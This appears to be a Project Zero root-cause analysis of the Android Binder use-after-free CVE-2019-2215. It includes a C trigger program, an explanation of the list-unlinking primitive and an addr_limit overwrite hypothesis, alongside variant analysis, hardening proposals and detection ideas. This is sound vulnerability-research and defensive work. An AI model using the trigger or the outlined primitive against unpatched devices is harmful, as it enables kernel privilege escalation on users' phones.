Maddie Stone, Project Zero (Originally posted on Project Zero blog 2020-07-27)

The Basics

Disclosure or Patch Date: 26 September 2019

Product: Google Android

Advisory: https://source.android.com/security/bulletin/2019-10-01#kernel-b

Affected Versions: Pre-Oct 6 2019 SPL for devices released prior to Fall 2019

First Patched Version: 6 Oct 2019 SPL+

Issue/Bug Report: https://bugs.chromium.org/p/project-zero/issues/detail?id=1942

Patch CL: https://android-review.googlesource.com/c/kernel/common/+/609966

Bug-Introducing CL: Unknown

Reporter(s): Maddie Stone of Google Project Zero

The Code

Proof-of-concept: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414885

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? No

The Vulnerability

**Bug class:** use-after-free (UAF)

Vulnerability details:

The vulnerability is a use-after-free (UAF) in the Binder kernel driver. The binder_thread struct, defined in drivers/android/binder.c, has a member named wait of type wait_queue_head_t. epoll keeps a pointer to wait even after the binder_thread struct containing it has been freed.

struct binder_thread {
        struct binder_proc *proc;
        struct rb_node rb_node;
        struct list_head waiting_thread_node;
        int pid;
        int looper;              /* only modified by this thread */
        bool looper_need_return; /* can be written by other thread */
        struct binder_transaction *transaction_stack;
        struct list_head todo;
        bool process_todo;
        struct binder_error return_error;
        struct binder_error reply_error;
        wait_queue_head_t wait;
        struct binder_stats stats;
        atomic_t tmp_ref;
        bool is_dead;
        struct task_struct *task;
};
struct __wait_queue_head {
        spinlock_t              lock;
        struct list_head        task_list;
};
typedef struct __wait_queue_head wait_queue_head_t;

The BINDER_THREAD_EXIT ioctl calls the binder_thread_release function which frees the binder_thread struct. However, if epoll is called on this thread, binder_poll tells epoll to use wait, the wait queue that is embedded in the binder_thread struct. Therefore, when the binder_thread struct is freed, epoll is pointing to the now freed wait queue. Normally, the wait queue used for polling on a file is guaranteed to be alive until the file’s release handler is called. Rare cases require the use of POLLFREE. In contrast, the Binder driver only worked if you constantly removed and re-added the epoll watch. This is the underlying bug and the use-after-free is a symptom of that.

When we look at the stack trace from KASAN in the original report, we can see that the use-after-free is in remove_wait_queue in kernel/sched/wait.c. The source code for remove_wait_queue is below. In remove_wait_queue, q is the pointer to the freed wait_queue_head_t in the binder_thread struct, and wait is an entry in the wait queue whose head has been freed. The use-after-free that triggered the KASAN crash is the call to spin_lock_irqsave with the argument &q->lock while q points to freed memory.

However, the \__remove_wait_queue call is more interesting for exploitation. As shown below, \__remove_wait_queue simply calls list_del on the task_list in the wait queue, giving us an unlinking primitive.

void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
{
        unsigned long flags;
        spin_lock_irqsave(&q->lock, flags);
        __remove_wait_queue(q, wait);
        spin_unlock_irqrestore(&q->lock, flags);
}

static inline void
__remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
        list_del(&old->task_list);
}
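
To see why list_del amounts to a write primitive, here is a minimal userspace sketch. It is not the kernel code: it models struct list_head and an unchecked unlink, the helper names list_link_single and list_del_unchecked are hypothetical, and the poison values that the kernel's list_del also stores in the removed entry are omitted. When the queue holds a single entry, unlinking that entry stores the address of the head into the head's own next and prev fields. In the bug scenario, those two pointer writes would land in freed memory.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace stand-in for the kernel's struct list_head. */
struct list_head {
    struct list_head *next;
    struct list_head *prev;
};

/* Hypothetical helper: build a circular list of a head plus one entry. */
void list_link_single(struct list_head *head, struct list_head *entry)
{
    assert(head != NULL && entry != NULL);
    head->next = entry;
    head->prev = entry;
    entry->next = head;
    entry->prev = head;
}

/* Unchecked unlink: two pointer writes through the entry's neighbours. */
void list_del_unchecked(struct list_head *entry)
{
    assert(entry != NULL);
    entry->next->prev = entry->prev;   /* writes into the next node (here, the head) */
    entry->prev->next = entry->next;   /* writes into the previous node (here, the head) */
}
```

After list_link_single(&head, &entry) followed by list_del_unchecked(&entry), both head.next and head.prev hold &head.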

The bug can be triggered with the following code, which was also in the original report from syzkaller.

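#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul

int main()
{
        int fd, epfd;
        struct epoll_event event = { .events = EPOLLIN };

        fd = open("/dev/binder", O_RDONLY);
        epfd = epoll_create(1000);
        /* binder_poll hands epoll the wait queue embedded in binder_thread */
        epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
        /* frees binder_thread while epoll still points at its wait queue */
        ioctl(fd, BINDER_THREAD_EXIT, NULL);
        /* epoll's cleanup at process exit then uses the freed wait queue */
}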
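
The constant 0x40046208 used for BINDER_THREAD_EXIT is not arbitrary. As a hedged sketch, assuming the Binder UAPI header defines the command as _IOW('b', 8, __s32) and that the target uses the generic Linux ioctl encoding (as x86 and ARM do), the value can be rebuilt with the standard _IOW macro. The function name binder_thread_exit_cmd is hypothetical, and int32_t stands in for the kernel's __s32.

```c
#include <assert.h>
#include <stdint.h>
#include <sys/ioctl.h>

/* Hypothetical helper: rebuild the BINDER_THREAD_EXIT command number. */
unsigned long binder_thread_exit_cmd(void)
{
    /* Assumed UAPI definition: _IOW('b', 8, __s32). */
    unsigned long cmd = _IOW('b', 8, int32_t);

    /* Same value assembled by hand under the generic encoding:
     * direction "write" (1) in bits 30-31, argument size (4) in bits 16-29,
     * type 'b' in bits 8-15, command number 8 in bits 0-7. */
    unsigned long by_hand = (1ul << 30) | (4ul << 16) |
                            ((unsigned long)'b' << 8) | 8ul;

    assert(cmd == by_hand);
    return cmd;
}
```

On architectures with a different ioctl bit layout, the hand-assembled value would not match and the assertion would fail.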

Patch analysis:

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

We do not have an exploit sample or a timeline for when this 0-day was developed. It seems equally possible that the attackers found the bug before syzkaller did in 2017, or that they found it afterwards by combing syzkaller reports for vulnerabilities that hadn’t been included in the Android Security Bulletin.

Based on the information that led to the finding of this bug, we can assume that the documents describing it were written after October 2018, because the Pixel 3 was released on Oct 18, 2018 and the documents claim that the Pixel 3 is unaffected. However, this does not tell us how long the attackers had been holding onto the vulnerability, or whether they found it before or after syzkaller did.

(Historical/present/future) context of bug:

This bug was originally found and reported in November 2017 and patched in February 2018. Syzbot, a syzkaller system that continuously fuzzes the Linux kernel, originally reported the use-after-free bug to Linux kernel mailing lists and the syzkaller-bugs mailing list in November 2017. From this report, the bug was patched in the Linux 4.14, Android 3.18, Android 4.4, and Android 4.9 kernels in February 2018. However, this fix was never included in an Android monthly security bulletin and thus the bug was not patched at the time for many Android devices, including the Pixel and Pixel 2.

The Exploit

Is the exploit method known? Probably

Based on the detailed descriptions that were provided stating "CONFIG_DEBUG_LIST breaks the primitive" and "CONFIG_ARM64_UAO hinders exploitation", we can hypothesize that the exploit uses an unlinking primitive to exploit the use-after-free and then overwrites the address limit stored in the task_struct to obtain kernel read/write. If this hypothesis is correct, then this is a known exploit method.
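
The hypothesized final step can be illustrated with a toy model. This is not the kernel's access check. It is a sketch of the idea that user-supplied pointers are validated against a per-task address limit, so raising that limit lets ordinary read and write system calls reach kernel addresses. The names model_task and model_access_ok and both limit values are hypothetical and chosen only for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative limits only; real values depend on architecture and config. */
#define MODEL_USER_LIMIT   0x0000007fffffffffULL
#define MODEL_KERNEL_LIMIT 0xffffffffffffffffULL

/* Hypothetical stand-in for the per-task state that holds the address limit. */
struct model_task {
    uint64_t addr_limit;
};

/* Toy range check: the last byte of the range must be at or below the limit. */
bool model_access_ok(const struct model_task *task, uint64_t addr, uint64_t size)
{
    assert(task != NULL && size > 0);
    uint64_t last = addr + size - 1;
    if (last < addr)            /* range wraps around the address space */
        return false;
    return last <= task->addr_limit;
}
```

With addr_limit set to MODEL_USER_LIMIT, a kernel-range address is rejected. Once addr_limit has been overwritten with MODEL_KERNEL_LIMIT, the same address passes the check.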

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

We decided on 2 different approaches for variant analysis:

  1. Searching for any other vulnerabilities that were patched upstream, but not in already released devices.

    The information that led to the finding of this vulnerability specifically highlighted that the attacker knew the vulnerability was patched in the upstream kernel but still affected released devices. It therefore seemed likely that other vulnerabilities fell into the same category and that, if they did, the attacker would be happy to use them too.

    To do this we compared the patch history for the Pixel 2 and the upstream Linux kernel for the Binder driver (/drivers/android/binder.c).

  2. Searching for any other kernel drivers whose poll handler uses a wait queue that is not tied to the lifetime of the file and thus could introduce a use-after-free.

    This approach looks for any other bug that follows the use-after-free pattern of this vulnerability. To do this variant analysis, we manually reviewed 214 of the 236 files in the Linux 4.4 kernel that contain a call to poll_wait. We didn’t review the final 22 files because they appeared to be copies of files that had already been reviewed.

    In the future, it would be more efficient to write a static analysis query to search for this pattern rather than to do it manually.

Found variants:

  • CVE-2020-0030: Potential use-after-free due to race condition in binder_thread_release

The patch for the in-the-wild 0-day (CVE-2019-2215) actually introduced another use-after-free condition. It had been found by syzkaller in Feb 2018 and patched in the upstream Linux kernel and Android common kernels in Feb 2018, but also wasn’t patched in already released devices.

The race condition was introduced by the patch for CVE-2019-2215, which added POLLFREE. A separate call to ep_remove_wait_queue (for example, one triggered by EPOLL_CTL_DEL) could race with POLLFREE and the freeing of the binder_thread struct. In that case, ep_remove_wait_queue could perform a UAF write to the spinlock in the wait_queue_head_t struct that was freed as part of the binder_thread.

This variant was found using approach #1 described in the previous section.

Structural improvements

  • Syncing with upstream kernels. This would ensure that the Android Security Bulletin is taking the most up-to-date security fixes known for the upstream kernels and thus OEMs can ensure their previously released devices get those patches. Android has published guidance for how to do Linux stable merges.
  • Enable CONFIG_DEBUG_LIST by default for Android kernels to break the unlinking exploit primitive. Overall, this would make it much more difficult to exploit this vulnerability.
  • Memory tagging could make it more difficult to exploit use-after-free and other memory corruption vulnerabilities.
  • Using the "Fixes:" tag in patches that are fixing a bug introduced by another commit. This could have prevented the variant (CVE-2020-0030) from going unpatched originally if the original fix had been tagged "Fixes: 7a3cee43e935 (ANDROID: binder: remove waitqueue when thread exits.)".
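
The CONFIG_DEBUG_LIST item above can be illustrated with a userspace sketch of a checked unlink. This is an approximation of the idea, not the kernel's code in lib/list_debug.c, and the names list_del_entry_valid and list_del_checked are hypothetical here. Before unlinking, the sketch confirms that both neighbours still point back at the entry. If the memory that held the list head has been freed and refilled with other data, that check is expected to fail and the two pointer writes never happen.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Userspace stand-in for the kernel's struct list_head. */
struct list_head {
    struct list_head *next;
    struct list_head *prev;
};

/* True only if both neighbours still link back to the entry. */
bool list_del_entry_valid(const struct list_head *entry)
{
    return entry->prev->next == entry && entry->next->prev == entry;
}

/* Checked unlink: refuses to write when the list looks corrupted. */
bool list_del_checked(struct list_head *entry)
{
    assert(entry != NULL);
    if (!list_del_entry_valid(entry))
        return false;               /* the kernel would warn here instead */
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
    return true;
}
```

In this model, an intact list unlinks normally, while a head whose next pointer has been replaced causes list_del_checked to return false and leave memory untouched.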

0-day detection methods

In this case we never obtained a copy of the exploit sample so the proposed detections are based on the proof-of-concept exploit that we developed.

  • In the Android kernel, we could attempt to monitor for the creation of a series of iovec arrays. This isn’t likely to be effective because only 10 are needed in this case, which seems to be a somewhat reasonable number to allocate.
  • In the Android kernel, we could attempt to look for instances where an iov_base and/or iov_len changes after it has been verified by rw_copy_check_uvector.
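
The second detection idea can be sketched in userspace as a snapshot-and-compare check. This is only an illustration of the concept under simplifying assumptions: the helper names iovec_snapshot and iovec_changed are hypothetical, rw_copy_check_uvector itself is not modelled, and a kernel implementation would need to decide where to store the snapshot and when to compare it.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>
#include <sys/uio.h>

/* Hypothetical helper: copy the array right after it has been validated. */
void iovec_snapshot(struct iovec *saved, const struct iovec *iov, size_t count)
{
    assert(saved != NULL && iov != NULL);
    memcpy(saved, iov, count * sizeof(*iov));
}

/* Hypothetical helper: report whether any base pointer or length
 * differs from the snapshot taken at validation time. */
bool iovec_changed(const struct iovec *saved, const struct iovec *iov, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        if (saved[i].iov_base != iov[i].iov_base ||
            saved[i].iov_len != iov[i].iov_len)
            return true;
    }
    return false;
}
```

A caller would take the snapshot immediately after validation and call iovec_changed just before the array is used. A true result would indicate that an entry was modified in between.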

Other References